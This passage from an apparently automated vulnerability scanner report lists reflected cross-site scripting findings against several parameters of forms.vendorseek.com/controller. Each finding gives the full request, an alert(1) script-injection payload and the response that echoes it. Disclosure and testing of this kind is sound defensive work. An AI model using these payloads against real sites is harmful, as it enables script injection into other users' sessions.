GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css98725"><script>alert(1)</script>035a41fdd3c&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:47:58 GMT
Connection: close
Set-Cookie: JSESSIONID=0910819EB9444DED0E32F7B56016470F.app6-all1; Path=/
Set-Cookie: JSESSIONID=280969539BE31D1AA4983B1943C38702.app6-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:47:58 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033278800; Expires=Sat, 16-Feb-2019 12:47:58 GMT; Path=/
Content-Length: 3857

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
<link rel="stylesheet" href="http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css98725"><script>alert(1)</script>035a41fdd3c">
...[SNIP]...

3.13. http://forms.vendorseek.com/controller [ctnum parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the ctnum request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c714"><script>alert(1)</script>0772ed318db was submitted in the ctnum parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=15c714"><script>alert(1)</script>0772ed318db&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:47:57 GMT
Connection: close
Set-Cookie: JSESSIONID=0B2B9F1AF510C2F672A168D452B24955.app5-all1; Path=/
Set-Cookie: JSESSIONID=3871577464F826A4332EED1ACEF87DB2.app5-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:47:57 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033277011; Expires=Sat, 16-Feb-2019 12:47:57 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
<Input Name="InternalLeadIFrameURL" Value="http://leadformone.quinstreet.com/controller?srvid=67110&ft=default&tnum=1&ctnum=15c714"><script>alert(1)</script>0772ed318db&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com
...[SNIP]...

3.14. http://forms.vendorseek.com/controller [fc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the fc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbc2c"><script>alert(1)</script>8ed63916645 was submitted in the fc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=bbc2c"><script>alert(1)</script>8ed63916645&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:05 GMT
Connection: close
Set-Cookie: JSESSIONID=971716267306361C96314EFB8680F444.app6-all1; Path=/
Set-Cookie: JSESSIONID=3E58315EDD56ED38C0FF84375578D7CD.app6-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:05 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033285157; Expires=Sat, 16-Feb-2019 12:48:05 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
ller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=bbc2c"><script>alert(1)</script>8ed63916645&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503
...[SNIP]...

3.15. http://forms.vendorseek.com/controller [ff parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the ff request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 664d5"><script>alert(1)</script>3b882b3290a was submitted in the ff parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=664d5"><script>alert(1)</script>3b882b3290a&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:03 GMT
Connection: close
Set-Cookie: JSESSIONID=D4E6A869C34C0515772463B8F903AFA7.app5-all2; Path=/
Set-Cookie: JSESSIONID=3F1FA27067DA4510556969041BAC1E45.app5-all2; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:03 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033283753; Expires=Sat, 16-Feb-2019 12:48:03 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
ntroller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=664d5"><script>alert(1)</script>3b882b3290a&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc20355
...[SNIP]...

3.16. http://forms.vendorseek.com/controller [ft parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the ft request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe09b"><script>alert(1)</script>af5e37d2a1b was submitted in the ft parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=defaultfe09b"><script>alert(1)</script>af5e37d2a1b&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:47:41 GMT
Connection: close
Set-Cookie: JSESSIONID=CB81F1344536AB31354E44561D4ECF4F.app5-all1; Path=/
Set-Cookie: JSESSIONID=E26210974A283F4E16B64A40FE650495.app5-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:47:41 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033261045; Expires=Sat, 16-Feb-2019 12:47:41 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
<Input Name="InternalLeadIFrameURL" Value="http://leadformone.quinstreet.com/controller?srvid=67110&ft=defaultfe09b"><script>alert(1)</script>af5e37d2a1b&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw
...[SNIP]...

3.17. http://forms.vendorseek.com/controller [hidepriv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the hidepriv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db25f"><script>alert(1)</script>07c88f93aad was submitted in the hidepriv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=truedb25f"><script>alert(1)</script>07c88f93aad&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:24 GMT
Connection: close
Set-Cookie: JSESSIONID=9427C5800EA81EBA82796AA5B99BE117.app5-all2; Path=/
Set-Cookie: JSESSIONID=023303D1ACD45B160E9D80D905189D67.app5-all2; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:24 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033304656; Expires=Sat, 16-Feb-2019 12:48:24 GMT; Path=/
Content-Length: 4121

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=truedb25f"><script>alert(1)</script>07c88f93aad&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y" Type="hidden"/>
...[SNIP]...

3.18. http://forms.vendorseek.com/controller [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85097"><script>alert(1)</script>380b955c126 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y&85097"><script>alert(1)</script>380b955c126=1 HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:30 GMT
Connection: close
Set-Cookie: JSESSIONID=9337A9AC4E07168705285D65BB671B4E.app6-all1; Path=/
Set-Cookie: JSESSIONID=CD6559A73D367EA093FA9CB0A8987F49.app6-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:30 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033310902; Expires=Sat, 16-Feb-2019 12:48:30 GMT; Path=/
Content-Length: 3817

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
10Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y&85097"><script>alert(1)</script>380b955c126=1" Type="hidden"/>
...[SNIP]...

3.19. http://forms.vendorseek.com/controller [sdw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the sdw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 131e9"><script>alert(1)</script>2aceb244d19 was submitted in the sdw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com131e9"><script>alert(1)</script>2aceb244d19&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:08 GMT
Connection: close
Set-Cookie: JSESSIONID=FCEB432FD39F7053DA305F3F1C7D4797.app6-all1; Path=/
Set-Cookie: JSESSIONID=2BF6FECB1787CEC337E007BF3CE19A56.app6-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:08 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033288544; Expires=Sat, 16-Feb-2019 12:48:08 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com131e9"><script>alert(1)</script>2aceb244d19&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=2012
...[SNIP]...

3.20. http://forms.vendorseek.com/controller [segid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the segid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47aa6"><script>alert(1)</script>17f7ae3a145 was submitted in the segid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

